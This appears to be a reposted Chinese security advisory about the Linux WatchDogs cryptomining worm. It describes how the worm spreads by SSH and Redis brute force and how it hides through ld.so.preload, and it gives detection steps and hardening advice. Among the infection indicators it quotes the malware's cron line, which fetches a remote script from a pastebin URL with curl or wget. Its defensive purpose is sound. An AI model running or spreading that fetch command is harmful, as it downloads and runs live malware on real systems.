美文网首页
关于linux watchdogs感染性挖矿病毒的预警通报

关于linux watchdogs感染性挖矿病毒的预警通报

作者: 海宇勇创 | 来源:发表于2019-02-28 15:41 被阅读0次

    技术支撑单位360企业安全集团安服团队发现:近日发生多起企业内网遭Linux WatchDogs 挖矿病毒感染事件,单个内网服务器被感染数量达上百台。事件安全级别为“高危”。现将事件详情通报如下:

    一、事件情况

    该挖矿病毒为go语言编辑实现的 ELF 格式文件,包含通信、加密算法、Redis 攻击、SSH 爆破、挖矿(挖矿币种为门罗币)等模块。主要通过全网 SSH、OrientDB、Redis、Activemq等服务进行爆破,获取主机权限后提取/root/.ssh/kown_hosts 内容,并主动连接历史连接过的 linux 服务器等手段实现自我扩散。该病毒运行会消耗大量主机 CPU 资源,同时劫持部分系统命令实现自我保护,彻底清除难度较大。

    二、影响范围

    已安装watchdogs的linux系统主机及云主机。

    三、处置建议

    (一)检查是否已感染该病毒

    1.进程特征:

    ps -ef|grep watchdogs

    ps -ef|grep ksoftirqds

    注:带s 的为病毒进程、不带s的为系统正常进程。

    2.计划任务特征:

    curl –fsSL https://pastebin.com/raw/sByq0rym||wget -q-O-https://pastebin.com/raw/sByq0rym;

    /etc/cron.d/root;

    /var/spool/cron/root;

    /var/spool/cron/crontabs/root。

    存在上述特征表示主机已被感染。

    (二)清理病毒文件

    分析确认该病毒加载/usr/local/lib/libioset.so动态链接库并将路径写入/etc/ld.so.preload 实现进程隐藏,建议使用busybox进行查杀。

    (三)安全防护

    1.为Redis 添加密码验证,禁止外网访问Redis。

    2.低权限运行Redis服务。

    3.禁止将连接机器私钥直接放至服务器内,如有必要建议设置密码。

    4.通过有限机器作为跳板机实现对其他内网机器的访问,避免所有机器随意互联互通,跳板机禁止部署相关可能存在风险的服务和业务。

    相关文章

      网友评论

          本文标题:关于linux watchdogs感染性挖矿病毒的预警通报

          本文链接:https://www.haomeiwen.com/subject/dmtkuqtx.html